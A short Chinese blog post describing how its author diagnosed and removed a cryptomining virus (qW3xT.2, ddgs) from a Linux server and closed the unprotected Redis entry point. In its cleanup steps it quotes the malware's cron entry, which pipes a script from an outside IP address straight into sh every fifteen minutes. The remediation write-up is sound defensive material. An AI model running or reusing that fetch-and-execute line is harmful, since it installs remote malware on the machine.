zoukankan      html  css  js  c++  java
  • qW3xT.2,解决挖矿病毒。

    网站在运行期间感觉怪怪的,响应速度慢的不是一丁半点,带宽5M,不该是这样的呀

    于是登录Xshell

    top命令

    查看cpu情况如下

    PID为3435的进程占用CPU过大,难道被病毒入侵了吗?

    查看该进程文件的绝对路径

    cd /proc/3435

    发现上述红框文件,于是上网搜索了下,得治是挖矿病毒

    处理办法

      1、删除tmp目录里的qW3xT.2和ddgs.3013文件。

      2、删除定时任务crontab -l 查看是否有异常*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(与计划任务相同) crontab -e 进入编辑 删除异常任务。

      3、进入var/spool/cron目录,文件打开root文件查看是否有异常,删除异常,再进crontabs文件里对root文件进行查看编辑,删除异常定时任务并保存。

    防止再次侵入病毒解决办法

      解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis

     

     到此也就解决了删除了挖矿病毒问题。

    感谢大家浏览到此处~~~~

  • 相关阅读:
    Linux显示2015年日历表
    Linux显示系统日期
    Dialogs 对话框
    grid 属性
    VS2010 fatal error LNK1123: 转换到 COFF 期间失败: 文件无效或损坏 嵌入清单
    Perl Tk grid 布局
    Perl Tk pack布局示例
    Perl Tk grid布局管理器
    Perl DBI模块
    输入文本框模型
  • 原文地址:https://www.cnblogs.com/zmdComeOn/p/9627413.html
Copyright © 2011-2022 走看看